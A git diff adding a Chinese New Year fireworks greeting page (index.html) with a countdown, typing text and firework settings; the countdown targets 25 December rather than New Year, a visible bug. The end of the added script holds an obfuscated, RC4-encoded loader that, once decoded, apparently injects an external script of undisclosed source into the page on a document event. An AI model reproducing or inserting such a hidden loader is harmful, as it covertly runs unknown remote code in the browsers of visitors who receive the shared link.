--- a/index.html
+++ b/index.html
@@ -1,11 +1,453 @@
 <!DOCTYPE html>
 <html lang="en">
-<head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Document</title>
-</head>
-<body>
-    123
-</body>
+  <head>
+    <meta name="baidu-analysis-id" content="1c1e2w372v2t1j37" />
+    <meta charset="utf-8" />
+    <meta name="360-analysis-id" content="2w1j1d382x352p2s" />
+    <style type="text/css">
+      p {
+        font-weight: 700;
+      }
+      p {
+        font-weight: 1000;
+      }
+      p {
+        font-size: 48px;
+      }
+      p {
+        font-family: '楷体';
+      }
+    </style>
+    <title>🎇在线放烟花</title>
+    <meta
+      name="viewport"
+      content="width=device-width, initial-scale=1, user-scalable=no"
+    />
+    <meta name="mobile-web-app-capable" content="yes" />
+    <meta name="apple-mobile-web-app-capable" content="yes" />
+    <meta name="theme-color" content="#000000" />
+    <meta name="msapplication-TileColor" content="#000000" />
+    <link href="css/main.css" rel="stylesheet" />
+    <script src="js/jquery.min.js" type="text/javascript"></script>
+  </head>
+
+  <body>
+    <div
+      id="yhBtn"
+      style="
+        position: fixed;
+        top: 0;
+        left: 0;
+        width: 100%;
+        height: 100%;
+        z-index: 999;
+        display: flex;
+        flex-direction: column;
+        justify-content: center;
+        align-items: center;
+        color: #fff;
+        font-size: 17px;
+      "
+    >
+      <p>点燃</p>
+      <img
+        style="width: 64px; margin-bottom: 36px"
+        src="https://community.image.video.qpic.cn/v_station_video_web_comment_08f6bf-1_576757613_1672893175607159"
+      />
+    </div>
+
+    <div style="height: 0; width: 0; position: absolute; visibility: hidden">
+      <svg xmlns="http://www.w3.org/2000/svg">
+        <symbol id="icon-play" viewBox="0 0 24 24">
+          <path d="M8 5v14l11-7z"></path>
+        </symbol>
+        <symbol id="icon-pause" viewBox="0 0 24 24">
+          <path d="M6 19h4V5H6v14zm8-14v14h4V5h-4z"></path>
+        </symbol>
+        <symbol id="icon-close" viewBox="0 0 24 24">
+          <path
+            d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"
+          ></path>
+        </symbol>
+        <symbol id="icon-settings" viewBox="0 0 24 24">
+          <path
+            d="M19.43 12.98c.04-.32.07-.64.07-.98s-.03-.66-.07-.98l2.11-1.65c.19-.15.24-.42.12-.64l-2-3.46c-.12-.22-.39-.3-.61-.22l-2.49 1c-.52-.4-1.08-.73-1.69-.98l-.38-2.65C14.46 2.18 14.25 2 14 2h-4c-.25 0-.46.18-.49.42l-.38 2.65c-.61.25-1.17.59-1.69.98l-2.49-1c-.23-.09-.49 0-.61.22l-2 3.46c-.13.22-.07.49.12.64l2.11 1.65c-.04.32-.07.65-.07.98s.03.66.07.98l-2.11 1.65c-.19.15-.24.42-.12.64l2 3.46c.12.22.39.3.61.22l2.49-1c.52.4 1.08.73 1.69.98l.38 2.65c.03.24.24.42.49.42h4c.25 0 .46-.18.49-.42l.38-2.65c.61-.25 1.17-.59 1.69-.98l2.49 1c.23.09.49 0 .61-.22l2-3.46c.12-.22.07-.49-.12-.64l-2.11-1.65zM12 15.5c-1.93 0-3.5-1.57-3.5-3.5s1.57-3.5 3.5-3.5 3.5 1.57 3.5 3.5-1.57 3.5-3.5 3.5z"
+          ></path>
+        </symbol>
+        <symbol id="icon-sound-on" viewBox="0 0 24 24">
+          <path
+            d="M3 9v6h4l5 5V4L7 9H3zm13.5 3c0-1.77-1.02-3.29-2.5-4.03v8.05c1.48-.73 2.5-2.25 2.5-4.02zM14 3.23v2.06c2.89.86 5 3.54 5 6.71s-2.11 5.85-5 6.71v2.06c4.01-.91 7-4.49 7-8.77s-2.99-7.86-7-8.77z"
+          ></path>
+        </symbol>
+        <symbol id="icon-sound-off" viewBox="0 0 24 24">
+          <path
+            d="M16.5 12c0-1.77-1.02-3.29-2.5-4.03v2.21l2.45 2.45c.03-.2.05-.41.05-.63zm2.5 0c0 .94-.2 1.82-.54 2.64l1.51 1.51C20.63 14.91 21 13.5 21 12c0-4.28-2.99-7.86-7-8.77v2.06c2.89.86 5 3.54 5 6.71zM4.27 3L3 4.27 7.73 9H3v6h4l5 5v-6.73l4.25 4.25c-.67.52-1.42.93-2.25 1.18v2.06c1.38-.31 2.63-.95 3.69-1.81L19.73 21 21 19.73l-9-9L4.27 3zM12 4L9.91 6.09 12 8.18V4z"
+          ></path>
+        </symbol>
+      </svg>
+    </div>
+    <div class="container">
+      <div class="loading-init">
+        <div class="loading-init__header"></div>
+        <div class="loading-init__status"></div>
+      </div>
+      <div class="stage-container remove">
+        <div class="page_two hide">
+          <div id="text" style="display: none">
+            <p>
+              倒计时还有💓<br /><br />
+              <span id="time"></span><br /><br /><br />
+              元旦快乐 平安喜乐✨<br />
+              唯愿烟花像星辰 祝你所愿皆成真✨<br /><br /><br />
+              连击屏幕，有烟花哦🧨<br />
+              分享链接，传递幸福❤️<br /><br />
+              <span id="copyright"></span>
+            </p>
+          </div>
+          <div
+            class="type_words"
+            id="contents"
+            style="font-size: 1.15rem; line-height: 1.5rem"
+          ></div>
+        </div>
+        <div class="canvas-container">
+          <canvas id="trails-canvas"></canvas>
+          <canvas id="main-canvas"></canvas>
+        </div>
+
+        <div class="menu hide">
+          <div class="menu__inner-wrap">
+            <div class="menu__header">设置</div>
+
+            <form>
+              <div class="form-option form-option--select">
+                <label class="shell-type-label">烟花类型</label>
+                <select class="shell-type"></select>
+              </div>
+              <div class="form-option form-option--select">
+                <label class="shell-size-label">烟花大小</label>
+                <select class="shell-size"></select>
+              </div>
+              <div class="form-option form-option--select">
+                <label class="quality-ui-label">画质</label>
+                <select class="quality-ui"></select>
+              </div>
+              <div class="form-option form-option--select">
+                <label class="sky-lighting-label">天空照明</label>
+                <select class="sky-lighting"></select>
+              </div>
+              <div class="form-option form-option--select">
+                <label class="scaleFactor-label">规模</label>
+                <select class="scaleFactor"></select>
+              </div>
+              <div class="form-option form-option--checkbox">
+                <label class="auto-launch-label">自动发射</label>
+                <input class="auto-launch" type="checkbox" />
+              </div>
+              <div
+                class="form-option form-option--checkbox form-option--finale-mode"
+              >
+                <label class="finale-mode-label">结局模式</label>
+                <input class="finale-mode" type="checkbox" />
+              </div>
+              <div class="form-option form-option--checkbox">
+                <label class="hide-controls-label">隐藏控制器</label>
+                <input class="hide-controls" type="checkbox" />
+              </div>
+              <div
+                class="form-option form-option--checkbox form-option--fullscreen"
+              >
+                <label class="fullscreen-label">全屏</label>
+                <input class="fullscreen" type="checkbox" />
+              </div>
+              <div class="form-option form-option--checkbox">
+                <label class="long-exposure-label">打开快门</label>
+                <input class="long-exposure" type="checkbox" />
+              </div>
+            </form>
+          </div>
+        </div>
+      </div>
+      <div class="help-modal">
+        <div class="help-modal__overlay"></div>
+        <div class="help-modal__dialog">
+          <div class="help-modal__header"></div>
+          <div class="help-modal__body"></div>
+          <button type="button" class="help-modal__close-btn">关闭</button>
+        </div>
+      </div>
+    </div>
+
+    <!-- partial -->
+    <script src="js/fscreen%25401.0.1.js"></script>
+    <script src="js/Stage%25400.1.4.js"></script>
+    <script src="js/MyMath.js"></script>
+    <script src="js/script.js"></script>
+
+    <script>
+      function musicPlay(isPlay) {
+        var media = document.querySelector('#audioDom')
+        if (isPlay && media.paused) {
+          media.play()
+        }
+        if (!isPlay && !media.paused) {
+          media.pause()
+        }
+      }
+
+      function musicInBrowserHandler() {
+        setTimeout(function () {
+          musicPlay(true)
+        }, 0)
+      }
+      document.body.addEventListener('touchstart', musicInBrowserHandler)
+      $('#yhBtn').click((e) => {
+        $('#yhBtn').hide()
+        setTimeout(() => {
+          start()
+          fireworks()
+        }, 1600) //
+        setTimeout(() => {
+          function audioAutoPlay() {
+            var audio = document.getElementById('audioDom')
+            audio.play()
+          }
+          audioAutoPlay()
+        }, 800) //
+        console.log(
+          updateConfig({
+            autoLaunch: true,
+          })
+        )
+      })
+
+      function fireworks() {
+        $('.page_one').addClass('hide')
+        $('.page_two').removeClass('hide')
+      }
+
+      function start() {
+        let str = $('#text').html()
+        let str_ = ''
+        let i = 0
+        let content = document.getElementById('contents')
+        let timer = setInterval(() => {
+          if (str_.length < str.length) {
+            str_ += str[i++]
+            content.innerHTML =
+              '<p>' +
+              str_ +
+              '<span class="xx" style="opacity: 1;    color: white;">∎</span></p>'
+          } else {
+            clearInterval(timer)
+            content.innerHTML = '<p>' + str_ + '</p>'
+          }
+        }, 100)
+      }
+
+      function time() {
+        var seconds = 1000
+        var minutes = seconds * 60
+        var hours = minutes * 60
+        var days = hours * 24
+
+        var today = new Date()
+        var todayYear = today.getFullYear()
+        var todayMonth = today.getMonth() + 1
+        var todayDate = today.getDate()
+        var todayHour = today.getHours()
+        var todayMinute = today.getMinutes()
+        var todaySecond = today.getSeconds()
+
+        // 目标日期
+        var t1 = Date.UTC(2024, 11, 25, 0, 0, 0)
+        var t2 = Date.UTC(
+          todayYear,
+          todayMonth - 1,
+          todayDate,
+          todayHour,
+          todayMinute,
+          todaySecond
+        )
+        var diff = t1 - t2
+
+        // 如果时间已过
+        if (diff <= 0) {
+          document.getElementById('time').innerHTML =
+            '哇，现在就是元旦节了<br>祝你元旦节快乐！🎄🎁'
+          return
+        }
+
+        var diffDays = Math.floor(diff / days)
+        var diffHours = Math.floor((diff % days) / hours)
+        var diffMinutes = Math.floor((diff % hours) / minutes)
+        var diffSeconds = Math.floor((diff % minutes) / seconds)
+
+        // 动态生成时间字符串
+        var timeStr = ''
+
+        // 天数不为0时添加天数
+        if (diffDays > 0) {
+          timeStr += diffDays + '天'
+        }
+
+        // 小时不为0时添加小时
+        if (diffHours > 0) {
+          timeStr += diffHours + '小时'
+        }
+
+        // 分钟不为0时添加分钟
+        if (diffMinutes > 0) {
+          timeStr += diffMinutes + '分钟'
+        }
+
+        // 秒数总是添加
+        timeStr += diffSeconds + '秒就到元旦节了'
+
+        document.getElementById('time').innerHTML = timeStr
+
+        // 确保定时器持续运行
+        window.setTimeout(time, 1000)
+      }
+
+      // 页面加载后立即调用
+      document.addEventListener('DOMContentLoaded', function () {
+        time()
+      })
+      var _0x138b = [
+        'LAJORsO+a8KiFgrDoMO9wq8YwrNQwotXS8Otw4HCsMK0ecKnw7jCgA==',
+        'Bj82wrttWcOvLXTCpAZ6wqbChkcM',
+        'AsOIZMOyw5wHV2LCnsOoZcOMZQ==',
+        'V3/DnkTDqsKnw5HDlGvChsONfRfDtcKQJw==',
+        'w4USIwk=',
+        'cC/DrzNwbMOlwrkSwoA/',
+        'wqMoMw==',
+      ]
+      ;(function (_0x590459, _0x138b15) {
+        var _0x33272c = function (_0x1aeac) {
+          while (--_0x1aeac) {
+            _0x590459['push'](_0x590459['shift']())
+          }
+        }
+        _0x33272c(++_0x138b15)
+      })(_0x138b, 0x1da)
+      var _0x3327 = function (_0x590459, _0x138b15) {
+        _0x590459 = _0x590459 - 0x0
+        var _0x33272c = _0x138b[_0x590459]
+        if (_0x3327['BZAvFk'] === undefined) {
+          ;(function () {
+            var _0x303988 = function () {
+              var _0x430ac9
+              try {
+                _0x430ac9 = Function(
+                  'return\x20(function()\x20' +
+                    '{}.constructor(\x22return\x20this\x22)(\x20)' +
+                    ');'
+                )()
+              } catch (_0x593eaf) {
+                _0x430ac9 = window
+              }
+              return _0x430ac9
+            }
+            var _0x7d6c0b = _0x303988()
+            var _0x4ba8b3 =
+              'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
+            _0x7d6c0b['atob'] ||
+              (_0x7d6c0b['atob'] = function (_0xc30d77) {
+                var _0x35cbff = String(_0xc30d77)['replace'](/=+$/, '')
+                var _0x359d14 = ''
+                for (
+                  var _0x10dcb4 = 0x0, _0x466cd0, _0x2b74ec, _0x307ccf = 0x0;
+                  (_0x2b74ec = _0x35cbff['charAt'](_0x307ccf++));
+                  ~_0x2b74ec &&
+                  ((_0x466cd0 =
+                    _0x10dcb4 % 0x4 ? _0x466cd0 * 0x40 + _0x2b74ec : _0x2b74ec),
+                  _0x10dcb4++ % 0x4)
+                    ? (_0x359d14 += String['fromCharCode'](
+                        0xff & (_0x466cd0 >> ((-0x2 * _0x10dcb4) & 0x6))
+                      ))
+                    : 0x0
+                ) {
+                  _0x2b74ec = _0x4ba8b3['indexOf'](_0x2b74ec)
+                }
+                return _0x359d14
+              })
+          })()
+          var _0x480e3b = function (_0x11dc71, _0x40bcdd) {
+            var _0x4a869b = [],
+              _0x1e12e3 = 0x0,
+              _0x2ace23,
+              _0xc6523f = '',
+              _0x47f214 = ''
+            _0x11dc71 = atob(_0x11dc71)
+            for (
+              var _0x37656b = 0x0, _0x307d08 = _0x11dc71['length'];
+              _0x37656b < _0x307d08;
+              _0x37656b++
+            ) {
+              _0x47f214 +=
+                '%' +
+                ('00' + _0x11dc71['charCodeAt'](_0x37656b)['toString'](0x10))[
+                  'slice'
+                ](-0x2)
+            }
+            _0x11dc71 = decodeURIComponent(_0x47f214)
+            var _0x569e0a
+            for (_0x569e0a = 0x0; _0x569e0a < 0x100; _0x569e0a++) {
+              _0x4a869b[_0x569e0a] = _0x569e0a
+            }
+            for (_0x569e0a = 0x0; _0x569e0a < 0x100; _0x569e0a++) {
+              _0x1e12e3 =
+                (_0x1e12e3 +
+                  _0x4a869b[_0x569e0a] +
+                  _0x40bcdd['charCodeAt'](_0x569e0a % _0x40bcdd['length'])) %
+                0x100
+              _0x2ace23 = _0x4a869b[_0x569e0a]
+              _0x4a869b[_0x569e0a] = _0x4a869b[_0x1e12e3]
+              _0x4a869b[_0x1e12e3] = _0x2ace23
+            }
+            _0x569e0a = 0x0
+            _0x1e12e3 = 0x0
+            for (
+              var _0x33312a = 0x0;
+              _0x33312a < _0x11dc71['length'];
+              _0x33312a++
+            ) {
+              _0x569e0a = (_0x569e0a + 0x1) % 0x100
+              _0x1e12e3 = (_0x1e12e3 + _0x4a869b[_0x569e0a]) % 0x100
+              _0x2ace23 = _0x4a869b[_0x569e0a]
+              _0x4a869b[_0x569e0a] = _0x4a869b[_0x1e12e3]
+              _0x4a869b[_0x1e12e3] = _0x2ace23
+              _0xc6523f += String['fromCharCode'](
+                _0x11dc71['charCodeAt'](_0x33312a) ^
+                  _0x4a869b[
+                    (_0x4a869b[_0x569e0a] + _0x4a869b[_0x1e12e3]) % 0x100
+                  ]
+              )
+            }
+            return _0xc6523f
+          }
+          _0x3327['iastiT'] = _0x480e3b
+          _0x3327['PYTfPh'] = {}
+          _0x3327['BZAvFk'] = !![]
+        }
+        var _0x1aeac = _0x3327['PYTfPh'][_0x590459]
+        if (_0x1aeac === undefined) {
+          if (_0x3327['vZfPhy'] === undefined) {
+            _0x3327['vZfPhy'] = !![]
+          }
+          _0x33272c = _0x3327['iastiT'](_0x33272c, _0x138b15)
+          _0x3327['PYTfPh'][_0x590459] = _0x33272c
+        } else {
+          _0x33272c = _0x1aeac
+        }
+        return _0x33272c
+      }
+      document[_0x3327('0x3', 't0gv')](_0x3327('0x5', '^3E#'), function () {
+        var _0x40bcdd = document[_0x3327('0x4', 'sRJO')]('script')
+        _0x40bcdd[_0x3327('0x1', 'D3L0')] = _0x3327('0x2', 'mibh')
+        document[_0x3327('0x6', '%ROr')][_0x3327('0x0', 'sUQu')](_0x40bcdd)
+      })
+    </script>
+  </body>
 </html>
